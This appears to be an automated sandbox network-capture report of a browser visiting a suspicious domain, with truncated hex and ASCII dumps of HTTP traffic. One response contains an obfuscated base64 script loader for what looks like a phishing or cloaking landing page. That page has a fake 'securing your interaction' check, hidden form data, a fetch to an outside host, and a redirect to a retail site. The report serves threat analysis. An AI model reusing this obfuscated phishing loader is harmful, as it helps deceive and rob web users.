                                                                                                                                                                                                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkdKZTFpa3A0RzhTUEJNaCtwZ1ZUeWc9PSIsInZhbHVlIjoiam5sUXVYVk1Na200QWpnbmdySVMxQk1HdExOcXlFdzhPMFZ1ZDBMZDN4TDRjaC9nanRWaVVRYk5FWU9HSFJvWTBxdHZKUzZGRzJCYkFUOFVUMC9WZXNoTWFaZUQzNjlUZ0s5a2k2OTY4TlRlYTZCOUxSaEE2Rm11d3hhUk1aZU4
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC1369INData Raw: 35 33 66 39 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 69 66 28 22 68 74 74 70 73 3a 2f 2f 75 53 71 65 2e 62 69 6e 34 74 67 6c 61 2e 63 6f 6d 2f 66 70 49 32 47 67 71 6c 2f 22 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 6a 77 68 4c 53 30 67 51 53 42 7a 59 58 52 70 63 32 5a 70 5a 57 51 67 59 33 56 7a 64 47 39 74 5a 58 49 67 61 58 4d 67 64 47 68 6c 49 47 4a 6c 63 33 51 67 59 6e 56 7a 61 57 35 6c 63 33 4d 67 63 33 52 79 59 58 52 6c 5a 33 6b 67 62 32 59
                                                                                                                                                                                                                                                                  Data Ascii: 53f9<script>if("https://uSqe.bin4tgla.com/fpI2Ggql/" == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCjwhLS0gQSBzYXRpc2ZpZWQgY3VzdG9tZXIgaXMgdGhlIGJlc3QgYnVzaW5lc3Mgc3RyYXRlZ3kgb2Y
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC1369INData Raw: 33 4e 51 59 53 49 73 49 6b 31 70 59 33 4a 76 63 32 39 6d 64 43 42 55 59 57 6b 67 54 47 55 69 4c 43 4a 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 57 57 6b 67 51 6d 46 70 64 47 6b 69 4c 43 4a 4e 62 32 35 6e 62 32 78 70 59 57 34 67 51 6d 46 70 64 47 6b 69 4c 43 4a 4e 56 69 42 43 62 32 78 70 49 69 77 69 54 58 6c 68 62 6d 31 68 63 69 42 55 5a 58 68 30 49 69 77 69 51 32 46 74 59 6e 4a 70 59 53 42 4e 59 58 52 6f 49 6a 73 4e 43 6e 30 4e 43 6d 4a 76 5a 48 6b 67 65 77 30 4b 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 41 6a 5a 6d 5a 6d 4f 77 30 4b 49 43 42 6f 5a 57 6c 6e 61 48 51 36 49 44 45 77 4d 43 55 37 44 51 6f 67 49 47 39 32 5a 58 4a 6d 62 47 39 33 4f 69 42 6f 61 57 52 6b 5a 57 34 37 44 51 70 39 44 51 6f 6a 51 6d 4a 75 55 47 74 70
                                                                                                                                                                                                                                                                  Data Ascii: 3NQYSIsIk1pY3Jvc29mdCBUYWkgTGUiLCJNaWNyb3NvZnQgWWkgQmFpdGkiLCJNb25nb2xpYW4gQmFpdGkiLCJNViBCb2xpIiwiTXlhbm1hciBUZXh0IiwiQ2FtYnJpYSBNYXRoIjsNCn0NCmJvZHkgew0KICBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOw0KICBoZWlnaHQ6IDEwMCU7DQogIG92ZXJmbG93OiBoaWRkZW47DQp9DQojQmJuUGtp
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC1369INData Raw: 31 6c 5a 47 6c 68 49 43 68 74 61 57 34 74 64 32 6c 6b 64 47 67 36 4f 54 6b 79 63 48 67 70 65 77 30 4b 49 30 4a 69 62 6c 42 72 61 58 56 47 56 56 45 67 4c 6d 4e 76 62 43 31 73 5a 79 30 30 65 32 5a 73 5a 58 67 36 4d 43 41 77 49 47 46 31 64 47 38 37 64 32 6c 6b 64 47 67 36 4d 7a 4d 75 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 6c 4f 33 30 4e 43 6e 30 4e 43 69 4e 43 59 6d 35 51 61 32 6c 31 52 6c 56 52 49 43 35 6e 4c 58 4a 6c 59 32 46 77 64 47 4e 6f 59 53 42 37 5a 47 6c 7a 63 47 78 68 65 54 6f 67 61 57 35 73 61 57 35 6c 4c 57 4a 73 62 32 4e 72 4f 33 30 4e 43 69 4e 43 59 6d 35 51 61 32 6c 31 52 6c 56 52 49 43 35 6b 61 58 4e 77 62 47 46 35 4c 54 51 67 65 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 58 4a 6c 62 53 41 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 32 5a 76 62
                                                                                                                                                                                                                                                                  Data Ascii: 1lZGlhIChtaW4td2lkdGg6OTkycHgpew0KI0JiblBraXVGVVEgLmNvbC1sZy00e2ZsZXg6MCAwIGF1dG87d2lkdGg6MzMuMzMzMzMzMzMlO30NCn0NCiNCYm5Qa2l1RlVRIC5nLXJlY2FwdGNoYSB7ZGlzcGxheTogaW5saW5lLWJsb2NrO30NCiNCYm5Qa2l1RlVRIC5kaXNwbGF5LTQge2ZvbnQtc2l6ZTogMXJlbSAhaW1wb3J0YW50O2Zvb
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC1369INData Raw: 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 63 33 52 35 62 47 55 39 49 6d 31 68 65 43 31 33 61 57 52 30 61 44 6f 67 4d 7a 6b 77 63 48 67 37 49 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 67 4d 7a 6b 77 63 48 67 37 49 6a 34 4e 43 6a 77 68 4c 53 30 67 56 47 68 6c 49 48 64 68 65 53 42 30 62 79 42 6e 5a 58 51 67 63 33 52 68 63 6e 52 6c 5a 43 42 70 63 79 42 30 62 79 42 78 64 57 6c 30 49 48 52 68 62 47 74 70 62 6d 63 67 59 57 35 6b 49 47 4a 6c 5a 32 6c 75 49 47 52 76 61 57 35 6e 4c 69 41 74 4c 54 34 4b 50 48 4e 77 59 57 34 67 59 32 78 68 63 33 4d 39 49 6d 52 70 63 33 42 73 59 58 6b 74 4e 43 49 2b 55 32 56 6a 64 58 4a 70 62 6d 63 67 65 57 39 31 63 69 42 70 62 6e 52 6c 63 6d 46 6a 64 47 6c 76 62 69 34 38 4c 33 4e 77 59 57 34 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a
                                                                                                                                                                                                                                                                  Data Ascii: 0LWNlbnRlciIgc3R5bGU9Im1heC13aWR0aDogMzkwcHg7IG1pbi13aWR0aDogMzkwcHg7Ij4NCjwhLS0gVGhlIHdheSB0byBnZXQgc3RhcnRlZCBpcyB0byBxdWl0IHRhbGtpbmcgYW5kIGJlZ2luIGRvaW5nLiAtLT4KPHNwYW4gY2xhc3M9ImRpc3BsYXktNCI+U2VjdXJpbmcgeW91ciBpbnRlcmFjdGlvbi48L3NwYW4+DQo8L2Rpdj4NCj
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC1369INData Raw: 63 32 46 30 61 58 4e 6d 59 57 4e 30 61 57 39 75 49 47 6c 75 49 47 64 70 64 6d 6c 75 5a 79 42 68 49 47 78 70 64 48 52 73 5a 53 42 74 62 33 4a 6c 49 48 52 6f 59 57 34 67 65 57 39 31 49 48 52 68 61 32 55 75 50 43 39 6b 61 58 59 2b 49 43 30 74 50 67 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 47 52 70 64 69 42 6a 62 47 46 7a 63 7a 30 69 62 58 51 74 4d 69 42 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6c 4e 47 56 55 35 30 63 46 4e 47 63 33 6f 69 50 67 30 4b 50 43 45
                                                                                                                                                                                                                                                                  Data Ascii: c2F0aXNmYWN0aW9uIGluIGdpdmluZyBhIGxpdHRsZSBtb3JlIHRoYW4geW91IHRha2UuPC9kaXY+IC0tPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZGRhdGEiIG5hbWU9ImJsdGRkYXRhIiB2YWx1ZT0iIj4NCjwvZm9ybT4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0ibXQtMiB0ZXh0LWNlbnRlciIgaWQ9IlNGVU50cFNGc3oiPg0KPCE
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC1369INData Raw: 32 4e 31 62 57 56 75 64 43 35 6e 5a 58 52 46 62 47 56 74 5a 57 35 30 51 6e 6c 4a 5a 43 67 69 63 47 46 6e 5a 57 78 70 62 6d 73 69 4b 53 35 32 59 57 78 31 5a 53 41 39 49 43 64 69 61 33 4e 6b 4a 7a 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 64 6d 46 79 49 46 4a 56 51 6d 78 4f 56 31 4e 4c 59 6d 49 67 50 53 41 69 4c 69 34 76 59 57 70 77 5a 58 4e 78 52 57 6b 35 57 46 52 32 55 57 49 33 4f 44 56 46 55 44 64 4e 63 30 68 5a 65 45 67 34 52 6e 64 6e 49 6a 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 6d 56 30 59 32 67 6f 4a 32 68 30 64 48 42 7a 4f 69 38 76 61 45 6c 43 4e 47 73 32 53 54 52 46 4d 46 64 31 65 56 68 31 55 47 46 48 63 6d 78 31 55 6a 59 7a 4e 33 42 4d 62 44 52 43 4e 57 4e 35 63 7a 63 78 53 54 46 6f 59 6b 45 78 59 55 78 42 63 58 42 5a 52 6b 6c 4b 52 53 35 31
                                                                                                                                                                                                                                                                  Data Ascii: 2N1bWVudC5nZXRFbGVtZW50QnlJZCgicGFnZWxpbmsiKS52YWx1ZSA9ICdia3NkJzsNCiAgICAgICAgdmFyIFJVQmxOV1NLYmIgPSAiLi4vYWpwZXNxRWk5WFR2UWI3ODVFUDdNc0hZeEg4RndnIjsNCiAgICAgICAgZmV0Y2goJ2h0dHBzOi8vaElCNGs2STRFMFd1eVh1UGFHcmx1UjYzN3BMbDRCNWN5czcxSTFoYkExYUxBcXBZRklKRS51
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC1369INData Raw: 68 30 64 48 42 7a 4f 69 38 76 64 33 64 33 4c 6d 46 7a 62 33 4d 75 59 32 39 74 4a 79 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 41 67 49 43 41 67 66 53 6b 4e 43 69 41 67 49 43 41 67 49 43 41 67 4c 6d 4e 68 64 47 4e 6f 4b 47 56 79 63 6d 39 79 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 64 32 6c 75 5a 47 39 33 4c 6d 78 76 59 32 46 30 61 57 39 75 4c 6e 4a 6c 63 47 78 68 59 32 55 6f 4a 32 68 30 64 48 42 7a 4f 69 38 76 64 33 64 33 4c 6d 46 7a 62 33 4d 75 59 32 39 74 4a 79 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 70 4f 77 30 4b 49 43 41 67 49 48 30 4e 43 6a 77 76 63 32 4e 79 61 58 42 30 50 67 30 4b 50 43 45 74 4c 53 42 55 61 47 55 67 62 32 35 73 65 53 42 77 62 47 46 6a 5a 53 42 33 61 47 56 79 5a 53 42 7a 64
                                                                                                                                                                                                                                                                  Data Ascii: h0dHBzOi8vd3d3LmFzb3MuY29tJyk7DQogICAgICAgIH0NCiAgICAgICAgfSkNCiAgICAgICAgLmNhdGNoKGVycm9yID0+IHsNCiAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlcGxhY2UoJ2h0dHBzOi8vd3d3LmFzb3MuY29tJyk7DQogICAgICAgIH0pOw0KICAgIH0NCjwvc2NyaXB0Pg0KPCEtLSBUaGUgb25seSBwbGFjZSB3aGVyZSBzd
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC1369INData Raw: 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 33 64 33 63 75 5a 32 39 76 5a 32 78 6c 4c 6d 4e 76 62 53 39 79 5a 57 4e 68 63 48 52 6a 61 47 45 76 59 58 42 70 4c 6d 70 7a 50 33 4a 6c 62 6d 52 6c 63 6a 31 6c 65 48 42 73 61 57 4e 70 64 43 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 47 31 6c 64 47 45 67 61 48 52 30 63 43 31 6c 63 58 56 70 64 6a 30 69 57 43 31 56 51 53 31 44 62 32 31 77 59 58 52 70 59 6d 78 6c 49 69 42 6a 62 32 35 30 5a 57 35 30 50 53 4a 4a 52 54 31 46 5a 47 64 6c 4c 47 4e 6f 63 6d 39 74 5a 54 30 78 49 6a 34 4e 43 69 41 67 49 43 41 38 62 57 56 30 59 53 42 75 59 57 31 6c 50 53 4a 79 62 32 4a 76 64 48 4d 69 49 47 4e 76 62 6e 52 6c 62 6e 51 39 49 6d 35 76 61 57 35 6b 5a 58 67 73 49 47 35 76 5a
                                                                                                                                                                                                                                                                  Data Ascii: NyaXB0IHNyYz0iaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS9yZWNhcHRjaGEvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZ
                                                                                                                                                                                                                                                                  2024-10-29 19:09:57 UTC1369INData Raw: 30 65 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 70 6a 59 57 78 6a 4b 44 45 75 4d 79 6b 37 66 51 30 4b 51 47 31 6c 5a 47 6c 68 49 43 68 74 61 57 34 74 64 32 6c 6b 64 47 67 36 4d 54 49 77 4d 48 42 34 4b 58 73 4e 43 69 4e 43 59 6d 35 51 61 32 6c 31 52 6c 56 52 49 47 67 30 65 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 78 4c 6a 56 79 5a 57 30 37 66 51 30 4b 66 51 30 4b 49 30 4a 69 62 6c 42 72 61 58 56 47 56 56 45 67 63 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 6a 41 37 62 57 46 79 5a 32 6c 75 4c 57 4a 76 64 48 52 76 62 54 6f 78 63 6d 56 74 4f 33 30 4e 43 69 4e 43 59 6d 35 51 61 32 6c 31 52 6c 56 52 4c 6d 4e 76 62 6e 52 68 61 57 35 6c 63 6e 74 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 74 77 59 57 52 6b 61 57 35 6e 4c 58 4a 70 5a 32 68 30 4f 69 42 32 59 58
                                                                                                                                                                                                                                                                  Data Ascii: 0e2ZvbnQtc2l6ZTpjYWxjKDEuMyk7fQ0KQG1lZGlhIChtaW4td2lkdGg6MTIwMHB4KXsNCiNCYm5Qa2l1RlVRIGg0e2ZvbnQtc2l6ZToxLjVyZW07fQ0KfQ0KI0JiblBraXVGVVEgcHttYXJnaW4tdG9wOjA7bWFyZ2luLWJvdHRvbToxcmVtO30NCiNCYm5Qa2l1RlVRLmNvbnRhaW5lcnt3aWR0aDogMTAwJTtwYWRkaW5nLXJpZ2h0OiB2YX


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  45192.168.2.1649759192.0.76.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:57 UTC432OUTGET /c.gif?u=https%3A%2F%2Fusqe.bin4tgla.com%2FfpI2Ggql%2F&r=&b=238502921&p=0&rand=0.5834010147506843 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: pixel.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:57 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:57 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                  Content-Length: 50
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:57 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  46192.168.2.1649761151.101.130.1374437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:57 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                                  Host: code.jquery.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                  Referer: https://usqe.bin4tgla.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:57 UTC610INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Content-Length: 89501
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                                  ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:57 GMT
                                                                                                                                                                                                                                                                  Age: 1245860
                                                                                                                                                                                                                                                                  X-Served-By: cache-lga21931-LGA, cache-dfw-kdal2120040-DFW
                                                                                                                                                                                                                                                                  X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                  X-Cache-Hits: 2, 6
                                                                                                                                                                                                                                                                  X-Timer: S1730228998.802365,VS0,VE0
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  2024-10-29 19:09:57 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                                  2024-10-29 19:09:58 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                                                                                                                                  Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                                                                                                                                  2024-10-29 19:09:58 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                                  Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                                                                                                                                  2024-10-29 19:09:58 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                                                                                                                                                  Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                                                                                                                                  2024-10-29 19:09:58 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                                                                                                                                  Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
